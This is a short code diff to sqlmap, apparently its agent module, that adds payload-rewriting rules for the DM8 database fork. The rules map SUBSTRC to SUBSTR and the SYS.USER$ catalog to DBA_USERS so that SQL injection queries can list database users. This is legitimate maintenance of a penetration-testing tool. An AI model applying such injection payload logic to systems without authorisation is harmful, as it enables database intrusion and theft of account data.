@@ -1,7 +1,7 @@
 #!/opt/local/Library/Frameworks/Python.framework/Versions/3.13/bin/python3.13
 
 """
-Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2025 sqlmap developers (https://sqlmap.org)
 See the file 'LICENSE' for copying permission
 """
 
@@ -424,6 +424,11 @@ class Agent(object):
                 payload = re.sub(r"(?i)\bORD\(", "ASCII(", payload)
                 payload = re.sub(r"(?i)\bMID\(", "SUBSTR(", payload)
                 payload = re.sub(r"(?i)\bNCHAR\b", "CHAR", payload)
+            elif hashDBRetrieve(HASHDB_KEYS.DBMS_FORK) in (FORK.DM8,):
+                payload = re.sub(r"(?i)\bSUBSTRC\(", "SUBSTR(", payload)
+                if "SYS.USER$" in payload:
+                    payload = re.sub(r"(?i)\bSYS.USER\$", "DBA_USERS", payload)
+                    payload = re.sub(r"(?i)\bNAME\b", "USERNAME", payload)
 
             # NOTE: https://github.com/sqlmapproject/sqlmap/issues/5057
             match = re.search(r"(=0x)(303a303a)3(\d{2,})", payload)
